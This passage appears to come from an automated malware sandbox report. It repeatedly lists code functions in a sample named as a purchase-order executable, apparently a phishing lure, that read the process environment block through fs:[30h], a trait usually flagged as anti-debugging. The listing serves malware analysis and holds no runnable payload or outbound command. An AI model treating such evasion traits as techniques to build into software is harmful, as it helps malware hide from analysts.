                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176E388 mov eax, dword ptr fs:[00000030h]2_2_0176E388
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176E388 mov eax, dword ptr fs:[00000030h]2_2_0176E388
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176E388 mov eax, dword ptr fs:[00000030h]2_2_0176E388
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01774260 mov eax, dword ptr fs:[00000030h]2_2_01774260
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01774260 mov eax, dword ptr fs:[00000030h]2_2_01774260
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01774260 mov eax, dword ptr fs:[00000030h]2_2_01774260
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176826B mov eax, dword ptr fs:[00000030h]2_2_0176826B
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018062A0 mov eax, dword ptr fs:[00000030h]2_2_018062A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018062A0 mov ecx, dword ptr fs:[00000030h]2_2_018062A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018062A0 mov eax, dword ptr fs:[00000030h]2_2_018062A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018062A0 mov eax, dword ptr fs:[00000030h]2_2_018062A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018062A0 mov eax, dword ptr fs:[00000030h]2_2_018062A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018062A0 mov eax, dword ptr fs:[00000030h]2_2_018062A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176A250 mov eax, dword ptr fs:[00000030h]2_2_0176A250
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01776259 mov eax, dword ptr fs:[00000030h]2_2_01776259
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F8243 mov eax, dword ptr fs:[00000030h]2_2_017F8243
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F8243 mov ecx, dword ptr fs:[00000030h]2_2_017F8243
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176823B mov eax, dword ptr fs:[00000030h]2_2_0176823B
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017802E1 mov eax, dword ptr fs:[00000030h]2_2_017802E1
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017802E1 mov eax, dword ptr fs:[00000030h]2_2_017802E1
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017802E1 mov eax, dword ptr fs:[00000030h]2_2_017802E1
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177A2C3 mov eax, dword ptr fs:[00000030h]2_2_0177A2C3
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177A2C3 mov eax, dword ptr fs:[00000030h]2_2_0177A2C3
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177A2C3 mov eax, dword ptr fs:[00000030h]2_2_0177A2C3
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177A2C3 mov eax, dword ptr fs:[00000030h]2_2_0177A2C3
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177A2C3 mov eax, dword ptr fs:[00000030h]2_2_0177A2C3
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0182A250 mov eax, dword ptr fs:[00000030h]2_2_0182A250
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0182A250 mov eax, dword ptr fs:[00000030h]2_2_0182A250
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017802A0 mov eax, dword ptr fs:[00000030h]2_2_017802A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017802A0 mov eax, dword ptr fs:[00000030h]2_2_017802A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01820274 mov eax, dword ptr fs:[00000030h]2_2_01820274
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01820274 mov eax, dword ptr fs:[00000030h]2_2_01820274
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01820274 mov eax, dword ptr fs:[00000030h]2_2_01820274
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01820274 mov eax, dword ptr fs:[00000030h]2_2_01820274
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01820274 mov eax, dword ptr fs:[00000030h]2_2_01820274
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01820274 mov eax, dword ptr fs:[00000030h]2_2_01820274
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01820274 mov eax, dword ptr fs:[00000030h]2_2_01820274
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01820274 mov eax, dword ptr fs:[00000030h]2_2_01820274
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01820274 mov eax, dword ptr fs:[00000030h]2_2_01820274
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01820274 mov eax, dword ptr fs:[00000030h]2_2_01820274
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01820274 mov eax, dword ptr fs:[00000030h]2_2_01820274
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01820274 mov eax, dword ptr fs:[00000030h]2_2_01820274
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F0283 mov eax, dword ptr fs:[00000030h]2_2_017F0283
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F0283 mov eax, dword ptr fs:[00000030h]2_2_017F0283
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F0283 mov eax, dword ptr fs:[00000030h]2_2_017F0283
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AE284 mov eax, dword ptr fs:[00000030h]2_2_017AE284
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AE284 mov eax, dword ptr fs:[00000030h]2_2_017AE284
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A656A mov eax, dword ptr fs:[00000030h]2_2_017A656A
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A656A mov eax, dword ptr fs:[00000030h]2_2_017A656A
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A656A mov eax, dword ptr fs:[00000030h]2_2_017A656A
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01778550 mov eax, dword ptr fs:[00000030h]2_2_01778550
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01778550 mov eax, dword ptr fs:[00000030h]2_2_01778550
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179E53E mov eax, dword ptr fs:[00000030h]2_2_0179E53E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179E53E mov eax, dword ptr fs:[00000030h]2_2_0179E53E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179E53E mov eax, dword ptr fs:[00000030h]2_2_0179E53E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179E53E mov eax, dword ptr fs:[00000030h]2_2_0179E53E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179E53E mov eax, dword ptr fs:[00000030h]2_2_0179E53E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780535 mov eax, dword ptr fs:[00000030h]2_2_01780535
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780535 mov eax, dword ptr fs:[00000030h]2_2_01780535
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780535 mov eax, dword ptr fs:[00000030h]2_2_01780535
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780535 mov eax, dword ptr fs:[00000030h]2_2_01780535
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780535 mov eax, dword ptr fs:[00000030h]2_2_01780535
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780535 mov eax, dword ptr fs:[00000030h]2_2_01780535
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01806500 mov eax, dword ptr fs:[00000030h]2_2_01806500
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01844500 mov eax, dword ptr fs:[00000030h]2_2_01844500
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01844500 mov eax, dword ptr fs:[00000030h]2_2_01844500
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01844500 mov eax, dword ptr fs:[00000030h]2_2_01844500
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01844500 mov eax, dword ptr fs:[00000030h]2_2_01844500
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01844500 mov eax, dword ptr fs:[00000030h]2_2_01844500
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01844500 mov eax, dword ptr fs:[00000030h]2_2_01844500
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01844500 mov eax, dword ptr fs:[00000030h]2_2_01844500
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017725E0 mov eax, dword ptr fs:[00000030h]2_2_017725E0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AC5ED mov eax, dword ptr fs:[00000030h]2_2_017AC5ED
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AC5ED mov eax, dword ptr fs:[00000030h]2_2_017AC5ED
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179E5E7 mov eax, dword ptr fs:[00000030h]2_2_0179E5E7
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179E5E7 mov eax, dword ptr fs:[00000030h]2_2_0179E5E7
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179E5E7 mov eax, dword ptr fs:[00000030h]2_2_0179E5E7
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179E5E7 mov eax, dword ptr fs:[00000030h]2_2_0179E5E7
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179E5E7 mov eax, dword ptr fs:[00000030h]2_2_0179E5E7
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179E5E7 mov eax, dword ptr fs:[00000030h]2_2_0179E5E7
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179E5E7 mov eax, dword ptr fs:[00000030h]2_2_0179E5E7
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179E5E7 mov eax, dword ptr fs:[00000030h]2_2_0179E5E7
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017765D0 mov eax, dword ptr fs:[00000030h]2_2_017765D0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AA5D0 mov eax, dword ptr fs:[00000030h]2_2_017AA5D0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AA5D0 mov eax, dword ptr fs:[00000030h]2_2_017AA5D0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AE5CF mov eax, dword ptr fs:[00000030h]2_2_017AE5CF
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AE5CF mov eax, dword ptr fs:[00000030h]2_2_017AE5CF
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017945B1 mov eax, dword ptr fs:[00000030h]2_2_017945B1
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017945B1 mov eax, dword ptr fs:[00000030h]2_2_017945B1
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F05A7 mov eax, dword ptr fs:[00000030h]2_2_017F05A7
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F05A7 mov eax, dword ptr fs:[00000030h]2_2_017F05A7
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F05A7 mov eax, dword ptr fs:[00000030h]2_2_017F05A7
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AE59C mov eax, dword ptr fs:[00000030h]2_2_017AE59C
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A4588 mov eax, dword ptr fs:[00000030h]2_2_017A4588
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01772582 mov eax, dword ptr fs:[00000030h]2_2_01772582
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01772582 mov ecx, dword ptr fs:[00000030h]2_2_01772582
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179A470 mov eax, dword ptr fs:[00000030h]2_2_0179A470
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179A470 mov eax, dword ptr fs:[00000030h]2_2_0179A470
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179A470 mov eax, dword ptr fs:[00000030h]2_2_0179A470
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0182A49A mov eax, dword ptr fs:[00000030h]2_2_0182A49A
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017FC460 mov ecx, dword ptr fs:[00000030h]2_2_017FC460
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179245A mov eax, dword ptr fs:[00000030h]2_2_0179245A
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176645D mov eax, dword ptr fs:[00000030h]2_2_0176645D
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AE443 mov eax, dword ptr fs:[00000030h]2_2_017AE443
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AE443 mov eax, dword ptr fs:[00000030h]2_2_017AE443
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AE443 mov eax, dword ptr fs:[00000030h]2_2_017AE443
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AE443 mov eax, dword ptr fs:[00000030h]2_2_017AE443
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AE443 mov eax, dword ptr fs:[00000030h]2_2_017AE443
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AE443 mov eax, dword ptr fs:[00000030h]2_2_017AE443
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AE443 mov eax, dword ptr fs:[00000030h]2_2_017AE443
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AE443 mov eax, dword ptr fs:[00000030h]2_2_017AE443
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AA430 mov eax, dword ptr fs:[00000030h]2_2_017AA430
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176C427 mov eax, dword ptr fs:[00000030h]2_2_0176C427
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176E420 mov eax, dword ptr fs:[00000030h]2_2_0176E420
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176E420 mov eax, dword ptr fs:[00000030h]2_2_0176E420
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176E420 mov eax, dword ptr fs:[00000030h]2_2_0176E420
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F6420 mov eax, dword ptr fs:[00000030h]2_2_017F6420
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F6420 mov eax, dword ptr fs:[00000030h]2_2_017F6420
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F6420 mov eax, dword ptr fs:[00000030h]2_2_017F6420
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F6420 mov eax, dword ptr fs:[00000030h]2_2_017F6420
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F6420 mov eax, dword ptr fs:[00000030h]2_2_017F6420
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F6420 mov eax, dword ptr fs:[00000030h]2_2_017F6420
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F6420 mov eax, dword ptr fs:[00000030h]2_2_017F6420
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A8402 mov eax, dword ptr fs:[00000030h]2_2_017A8402
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A8402 mov eax, dword ptr fs:[00000030h]2_2_017A8402
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A8402 mov eax, dword ptr fs:[00000030h]2_2_017A8402
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017704E5 mov ecx, dword ptr fs:[00000030h]2_2_017704E5
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A44B0 mov ecx, dword ptr fs:[00000030h]2_2_017A44B0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017FA4B0 mov eax, dword ptr fs:[00000030h]2_2_017FA4B0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0182A456 mov eax, dword ptr fs:[00000030h]2_2_0182A456
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017764AB mov eax, dword ptr fs:[00000030h]2_2_017764AB
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01778770 mov eax, dword ptr fs:[00000030h]2_2_01778770
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780770 mov eax, dword ptr fs:[00000030h]2_2_01780770
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780770 mov eax, dword ptr fs:[00000030h]2_2_01780770
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780770 mov eax, dword ptr fs:[00000030h]2_2_01780770
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780770 mov eax, dword ptr fs:[00000030h]2_2_01780770
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780770 mov eax, dword ptr fs:[00000030h]2_2_01780770
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780770 mov eax, dword ptr fs:[00000030h]2_2_01780770
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780770 mov eax, dword ptr fs:[00000030h]2_2_01780770
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780770 mov eax, dword ptr fs:[00000030h]2_2_01780770
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780770 mov eax, dword ptr fs:[00000030h]2_2_01780770
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780770 mov eax, dword ptr fs:[00000030h]2_2_01780770
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780770 mov eax, dword ptr fs:[00000030h]2_2_01780770
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780770 mov eax, dword ptr fs:[00000030h]2_2_01780770
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181678E mov eax, dword ptr fs:[00000030h]2_2_0181678E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017FE75D mov eax, dword ptr fs:[00000030h]2_2_017FE75D
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018247A0 mov eax, dword ptr fs:[00000030h]2_2_018247A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01770750 mov eax, dword ptr fs:[00000030h]2_2_01770750
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F4755 mov eax, dword ptr fs:[00000030h]2_2_017F4755
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2750 mov eax, dword ptr fs:[00000030h]2_2_017B2750
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2750 mov eax, dword ptr fs:[00000030h]2_2_017B2750
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A674D mov esi, dword ptr fs:[00000030h]2_2_017A674D
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A674D mov eax, dword ptr fs:[00000030h]2_2_017A674D
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A674D mov eax, dword ptr fs:[00000030h]2_2_017A674D
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A273C mov eax, dword ptr fs:[00000030h]2_2_017A273C
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A273C mov ecx, dword ptr fs:[00000030h]2_2_017A273C
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A273C mov eax, dword ptr fs:[00000030h]2_2_017A273C
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017EC730 mov eax, dword ptr fs:[00000030h]2_2_017EC730
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AC720 mov eax, dword ptr fs:[00000030h]2_2_017AC720
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AC720 mov eax, dword ptr fs:[00000030h]2_2_017AC720
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01770710 mov eax, dword ptr fs:[00000030h]2_2_01770710
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A0710 mov eax, dword ptr fs:[00000030h]2_2_017A0710
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AC700 mov eax, dword ptr fs:[00000030h]2_2_017AC700
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017747FB mov eax, dword ptr fs:[00000030h]2_2_017747FB
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017747FB mov eax, dword ptr fs:[00000030h]2_2_017747FB
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017927ED mov eax, dword ptr fs:[00000030h]2_2_017927ED
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017927ED mov eax, dword ptr fs:[00000030h]2_2_017927ED
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017927ED mov eax, dword ptr fs:[00000030h]2_2_017927ED
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017FE7E1 mov eax, dword ptr fs:[00000030h]2_2_017FE7E1
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177C7C0 mov eax, dword ptr fs:[00000030h]2_2_0177C7C0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F07C3 mov eax, dword ptr fs:[00000030h]2_2_017F07C3
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017707AF mov eax, dword ptr fs:[00000030h]2_2_017707AF
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A2674 mov eax, dword ptr fs:[00000030h]2_2_017A2674
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AA660 mov eax, dword ptr fs:[00000030h]2_2_017AA660
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AA660 mov eax, dword ptr fs:[00000030h]2_2_017AA660
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0178C640 mov eax, dword ptr fs:[00000030h]2_2_0178C640
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A8620 mov eax, dword ptr fs:[00000030h]2_2_017A8620
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A6620 mov eax, dword ptr fs:[00000030h]2_2_017A6620
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177262C mov eax, dword ptr fs:[00000030h]2_2_0177262C
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0178E627 mov eax, dword ptr fs:[00000030h]2_2_0178E627
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2619 mov eax, dword ptr fs:[00000030h]2_2_017B2619
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0178260B mov eax, dword ptr fs:[00000030h]2_2_0178260B
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0178260B mov eax, dword ptr fs:[00000030h]2_2_0178260B
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0178260B mov eax, dword ptr fs:[00000030h]2_2_0178260B
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0178260B mov eax, dword ptr fs:[00000030h]2_2_0178260B
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0178260B mov eax, dword ptr fs:[00000030h]2_2_0178260B
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0178260B mov eax, dword ptr fs:[00000030h]2_2_0178260B
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0178260B mov eax, dword ptr fs:[00000030h]2_2_0178260B
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017EE609 mov eax, dword ptr fs:[00000030h]2_2_017EE609
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017EE6F2 mov eax, dword ptr fs:[00000030h]2_2_017EE6F2
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017EE6F2 mov eax, dword ptr fs:[00000030h]2_2_017EE6F2
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017EE6F2 mov eax, dword ptr fs:[00000030h]2_2_017EE6F2
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017EE6F2 mov eax, dword ptr fs:[00000030h]2_2_017EE6F2
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F06F1 mov eax, dword ptr fs:[00000030h]2_2_017F06F1
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F06F1 mov eax, dword ptr fs:[00000030h]2_2_017F06F1
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AA6C7 mov ebx, dword ptr fs:[00000030h]2_2_017AA6C7
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AA6C7 mov eax, dword ptr fs:[00000030h]2_2_017AA6C7
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A66B0 mov eax, dword ptr fs:[00000030h]2_2_017A66B0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AC6A6 mov eax, dword ptr fs:[00000030h]2_2_017AC6A6
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01774690 mov eax, dword ptr fs:[00000030h]2_2_01774690
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01774690 mov eax, dword ptr fs:[00000030h]2_2_01774690
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0183866E mov eax, dword ptr fs:[00000030h]2_2_0183866E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0183866E mov eax, dword ptr fs:[00000030h]2_2_0183866E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017FC97C mov eax, dword ptr fs:[00000030h]2_2_017FC97C
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B096E mov eax, dword ptr fs:[00000030h]2_2_017B096E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B096E mov edx, dword ptr fs:[00000030h]2_2_017B096E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B096E mov eax, dword ptr fs:[00000030h]2_2_017B096E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01796962 mov eax, dword ptr fs:[00000030h]2_2_01796962
